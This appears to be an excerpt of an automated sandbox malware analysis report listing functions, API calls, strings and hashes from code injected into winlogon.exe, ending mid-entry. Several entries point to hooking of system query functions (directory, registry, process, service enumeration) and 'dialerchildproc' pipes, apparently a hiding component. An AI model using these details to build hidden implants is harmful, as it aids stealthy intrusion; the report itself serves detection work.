HeapAlloc.KERNEL32 ref: 000002D0165E13ED
GetProcessHeap.KERNEL32 ref: 000002D0165E140A
HeapFree.KERNEL32 ref: 000002D0165E1418
lstrlenW.KERNEL32 ref: 000002D0165E1421
GetProcessHeap.KERNEL32 ref: 000002D0165E142F
HeapAlloc.KERNEL32 ref: 000002D0165E143D
StrCpyW.SHLWAPI ref: 000002D0165E145F
GetProcessHeap.KERNEL32 ref: 000002D0165E1476
HeapFree.KERNEL32 ref: 000002D0165E1484

Strings

d, xrefs: 000002D0165E135A

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: e3e3399429e55960cf070cc16a5005b5190db7e605521ce6618ec048f68560e7
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: BE517F76200B8486EB60CFA2E88879AB7A1F788FC9F844126DE4D07768DF3DC545CB10

Function 000002D0165E1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002D0165E1D1F

Part of subcall function 000002D0165E1FD4: GetModuleHandleA.KERNEL32 ref: 000002D0165E1FEC
Part of subcall function 000002D0165E1FD4: GetProcAddress.KERNEL32 ref: 000002D0165E1FFD

Part of subcall function 000002D0165E5B30: GetCurrentThreadId.KERNEL32 ref: 000002D0165E5B6B

Strings

advapi32.dll, xrefs: 000002D0165E1DF7, 000002D0165E1E18
NtQuerySystemInformation, xrefs: 000002D0165E1D45
EnumServicesStatusExW, xrefs: 000002D0165E1E11, 000002D0165E1E32
NtEnumerateValueKey, xrefs: 000002D0165E1DD6
NtQueryDirectoryFile, xrefs: 000002D0165E1D7F
NtDeviceIoControlFile, xrefs: 000002D0165E1E56
EnumServiceGroupW, xrefs: 000002D0165E1DF0
NtQueryDirectoryFileEx, xrefs: 000002D0165E1D9C
ntdll.dll, xrefs: 000002D0165E1D2D
sechost.dll, xrefs: 000002D0165E1E39
NtEnumerateKey, xrefs: 000002D0165E1DB9
NtResumeThread, xrefs: 000002D0165E1D62

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: 9dee3d71542fb905587bd6568b7d178f2fe6f5c2276b71c2ce632fa0ceebaf95
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: B731C2A5500ACAA0EF50EFE5ECD97D4B324BB04385FC09563A42D02179AF79CF49C7A0

Function 000002D016586910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002D016586938
__scrt_acquire_startup_lock.LIBCMT ref: 000002D01658698A
_RTC_Initialize.LIBCMT ref: 000002D0165869B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002D0165869DE
__scrt_release_startup_lock.LIBCMT ref: 000002D016586A09

Strings

`dynamic initializer for ', xrefs: 000002D0165869C7
`eh vector copy constructor iterator', xrefs: 000002D016586A3B
scriptor', xrefs: 000002D016586B39, 000002D016586BB2, 000002D016586BEC
`eh vector vbase copy constructor iterator', xrefs: 000002D0165869EE

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: dd7692e2b99b60a86f76d6b3ad3452ab25c272ff970cedf1c1e1e01c02871081
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 8B81B1616102E186FB50ABE7DCDD3592298EB85B88FD48027AA4D47FB7DB38CD458720

Function 000002D016616910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002D016616938
__scrt_acquire_startup_lock.LIBCMT ref: 000002D01661698A
_RTC_Initialize.LIBCMT ref: 000002D0166169B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002D0166169DE
__scrt_release_startup_lock.LIBCMT ref: 000002D016616A09

Strings

`eh vector vbase copy constructor iterator', xrefs: 000002D0166169EE
`eh vector copy constructor iterator', xrefs: 000002D016616A3B
`dynamic initializer for ', xrefs: 000002D0166169C7
scriptor', xrefs: 000002D016616B39, 000002D016616BB2, 000002D016616BEC

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: b7fad54de8152518f9edab8cf547b60603a1147b6fb5ed7f09f5639719b823ef
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 4181B0697002E186FB50ABE59CDD36926E0ABC7780FD8852FA90DC77B6DB38CD458700

Function 000002D0165ECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002D0165ECE37
FlsGetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECE4C
FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECE6D
FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECE9A
FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECEAB
FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECEBC
SetLastError.KERNEL32 ref: 000002D0165ECED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF0D
FlsSetValue.KERNEL32(?,?,00000001,000002D0165EECCC,?,?,?,?,000002D0165EBF9F,?,?,?,?,?,000002D0165E7AB0), ref: 000002D0165ECF2C

Part of subcall function 000002D0165ED6CC: HeapAlloc.KERNEL32 ref: 000002D0165ED721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF54

Part of subcall function 000002D0165ED744: HeapFree.KERNEL32 ref: 000002D0165ED75A
Part of subcall function 000002D0165ED744: GetLastError.KERNEL32 ref: 000002D0165ED764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF76

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: 6cb119c879d4005e3e486556fd0f16809afcb4c169a1b85a080ac9ab7b906ee7
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: D14162212016C546FF69A7F95DDE369E2425B447B0FD4472BB83E0A7F6DE2ACE418200

Function 000002D0165E2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002D0165E2259
GetCurrentProcessId.KERNEL32 ref: 000002D0165E2263

Part of subcall function 000002D0165E1934: OpenProcess.KERNEL32 ref: 000002D0165E1952
Part of subcall function 000002D0165E1934: IsWow64Process.KERNEL32 ref: 000002D0165E1968
Part of subcall function 000002D0165E1934: CloseHandle.KERNEL32 ref: 000002D0165E1983

CreateFileW.KERNEL32 ref: 000002D0165E22BC
WriteFile.KERNEL32 ref: 000002D0165E22E4
ReadFile.KERNEL32 ref: 000002D0165E2303
CloseHandle.KERNEL32 ref: 000002D0165E230C

Strings

\\.\pipe\dialerchildproc64, xrefs: 000002D0165E228C
\\.\pipe\dialerchildproc32, xrefs: 000002D0165E2293

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: 27c92a905a2f4f6f1a7d1a88f5f4c691c2a465980edda73e2f7a22435be0af33
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: 92212F3661479082FB108B65F88875977A5F789BA5F904216EA5D03BB8DF7CC949CF00

Function 000002D016589944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002D0165899A1

Part of subcall function 000002D01658A814: __GetUnwindTryBlock.LIBCMT ref: 000002D01658A857
Part of subcall function 000002D01658A814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002D01658A87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002D016589A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002D016589CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 000002D016589DDA

Strings

csm, xrefs: 000002D016589A22
csm, xrefs: 000002D016589A9C
csm, xrefs: 000002D0165899BB

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: 8d33458c817a64122548c589ceefed1e9e6f3c6a843f5d4004e67bc5e997e060
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: 16E170726057808AEB60DFAAD8C839D77B8F755B98F900116EE8D57FA6CB34C991C700

Function 000002D0165EA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002D0165EA5A1

Part of subcall function 000002D0165EB414: __GetUnwindTryBlock.LIBCMT ref: 000002D0165EB457
Part of subcall function 000002D0165EB414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002D0165EB47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002D0165EA679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002D0165EA8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 000002D0165EA9DA

Strings

csm, xrefs: 000002D0165EA5BB
csm, xrefs: 000002D0165EA69C
csm, xrefs: 000002D0165EA622

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: 3b43c7ab403b83ca95457f37da0d4b500b38ba5a1a126430ff915fab710d6147
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: 7BE14C72A047C08AEF60DFB5988839DB7A0F755798F900117EE8D57BA9CB36CA91C740

Function 000002D016619944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002D0166199A1

Part of subcall function 000002D01661A814: __GetUnwindTryBlock.LIBCMT ref: 000002D01661A857
Part of subcall function 000002D01661A814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002D01661A87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002D016619A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002D016619CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 000002D016619DDA

Strings

csm, xrefs: 000002D016619A22
csm, xrefs: 000002D016619A9C
csm, xrefs: 000002D0166199BB

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: a2a3fd78db194ff4db1db09d07f917027e0369e1bd98e7c59f7a79fbd41e88f4
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: 87E17372604BC086EB60DFA5D8C839D77A0F796B98F94421EDE8D57BA5CB34C991C700

Function 000002D0165EF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 000002D0165EF510
GetProcAddress.KERNEL32 ref: 000002D0165EF51C

Strings

api-ms-, xrefs: 000002D0165EF45A
ext-ms-, xrefs: 000002D0165EF46D

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: d0c3c69c08ddd6f5c27ead1c77a57a672af2ad5f3c132c9258f8044c477055ab
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: D0410622311A9091FF16CFEAAD88756A395B744BE0FC4412B9D4E877A4EE3ECE458310

Function 000002D0165E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002D0165E10B1
RegEnumValueW.ADVAPI32 ref: 000002D0165E1117
GetProcessHeap.KERNEL32 ref: 000002D0165E115A
HeapAlloc.KERNEL32 ref: 000002D0165E1168
GetProcessHeap.KERNEL32 ref: 000002D0165E1185
HeapFree.KERNEL32 ref: 000002D0165E1193

Strings

d, xrefs: 000002D0165E10D6

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: 60b4ca63da48bf83ee31c643dec68d0684812f94169e8e12275eb22dcfa7cc50
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: F4416273614BC4C6EB64CFA1E88879EB7A1F388B99F448116DA8D07768DF39C945CB40

Function 000002D0165ED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED087
FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0A6
FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0CE
FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0DF
FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0F0

Strings

1%, xrefs: 000002D0165ED0CE
Y%, xrefs: 000002D0165ED0A6

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: 7080bbce82f1be4da0ddcc39a1ebc959a46846a47c0639f49ef077fcb6817628
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: F51133617042C442FF6857ED5DDD369E2415B447F0FD84327A83E466FAEE2ACE428600

Function 000002D0165E7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002D0165E7538
__scrt_acquire_startup_lock.LIBCMT ref: 000002D0165E758A
_RTC_Initialize.LIBCMT ref: 000002D0165E75B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002D0165E75DE
__scrt_release_startup_lock.LIBCMT ref: 000002D0165E7609

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: cc22ab156fd64d921cb8bab48c84aed77748f638e97627413a858d82ffff3ace
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 2E819F216007C186FF50ABE5ACC93B9E690EB85784FD4442BEA4D477B6EB3ACE45C700

Function 000002D0165E9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000002D0165E9E49
GetLastError.KERNEL32 ref: 000002D0165E9E57
LoadLibraryExW.KERNEL32 ref: 000002D0165E9E81
FreeLibrary.KERNEL32 ref: 000002D0165E9EC7
GetProcAddress.KERNEL32 ref: 000002D0165E9ED3

Strings

api-ms-, xrefs: 000002D0165E9E69

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: aca1f05cb46fc00515c66d976e56b7ae3e88fb2388c081806b711800b0246c42
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: 5031B821312BD1D1EF15DBD2AC88755A3A4B748BA0FD909279E1D477B0EF3ACA558310

Function 000002D0165F3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002D0165F3DE5
GetLastError.KERNEL32 ref: 000002D0165F3DF1
CloseHandle.KERNEL32 ref: 000002D0165F3E09
CreateFileW.KERNEL32 ref: 000002D0165F3E34
WriteConsoleW.KERNEL32 ref: 000002D0165F3E53

Strings

CONOUT$, xrefs: 000002D0165F3E15

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: d628bd0090cde46b23efa145587aed2904a5f36c40d9d109057e4cb8b91bb961
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 71118F31310BD086E7508BA2EC88719B6A4F788FE5F944266EE5E877B5CF78CC148744

Function 000002D0165E2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D0165E2F27
HeapAlloc.KERNEL32 ref: 000002D0165E2F3A
StrCmpNIW.SHLWAPI ref: 000002D0165E2FAF
GetProcessHeap.KERNEL32 ref: 000002D0165E3015
HeapFree.KERNEL32 ref: 000002D0165E3023

Strings

dialer, xrefs: 000002D0165E2FA8

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: a1042e87f8364f6b2e966bad11af8e790b8d99eaa053b685ef812c5dffe2a578
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: 6531B522701B9186EB14CF96DD88769B7A0FB44BC0F8881229E4C47B75EF3ACD618700

Function 000002D0165E14A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D0165E14C5
HeapFree.KERNEL32 ref: 000002D0165E14D4
GetProcessHeap.KERNEL32 ref: 000002D0165E14E1
HeapFree.KERNEL32 ref: 000002D0165E14F0
GetProcessHeap.KERNEL32 ref: 000002D0165E1500

Strings

C:\Windows\system32\winlogon.exe, xrefs: 000002D0165F61A9, 000002D0165F61B1

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID: C:\Windows\system32\winlogon.exe
API String ID: 3168794593-3603389050
Opcode ID: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
Instruction ID: 7f7260ef79563c5a266f126e1a848f4d5cc61924374436ce50858df01a2f744e
Opcode Fuzzy Hash: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
Instruction Fuzzy Hash: 8621A0AB508AE08AE760DFB59CD9B9D37A1F749B44F894057DB4D83367DE25CC088720

Function 000002D0165ECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002D0165ECFAF
FlsSetValue.KERNEL32(?,?,?,000002D0165ED6B5,?,?,?,?,000002D0165ED778), ref: 000002D0165ECFE5
FlsSetValue.KERNEL32(?,?,?,000002D0165ED6B5,?,?,?,?,000002D0165ED778), ref: 000002D0165ED012
FlsSetValue.KERNEL32(?,?,?,000002D0165ED6B5,?,?,?,?,000002D0165ED778), ref: 000002D0165ED023
FlsSetValue.KERNEL32(?,?,?,000002D0165ED6B5,?,?,?,?,000002D0165ED778), ref: 000002D0165ED034
SetLastError.KERNEL32 ref: 000002D0165ED04F

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: 881857e728745ec88ca4b8388d6fa749b937d482b05cecb59b8676985d1b6840
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: B7113D212052C482FF64A7F99DDD329E2426B947B0F945727A83E477F6EE6ACE418600

Function 000002D0165E199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002D0165E19C2
K32GetModuleFileNameExW.KERNEL32 ref: 000002D0165E19E0
PathFindFileNameW.SHLWAPI ref: 000002D0165E19EF
lstrlenW.KERNEL32 ref: 000002D0165E19FB
StrCpyW.SHLWAPI ref: 000002D0165E1A0E
CloseHandle.KERNEL32 ref: 000002D0165E1A1C

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
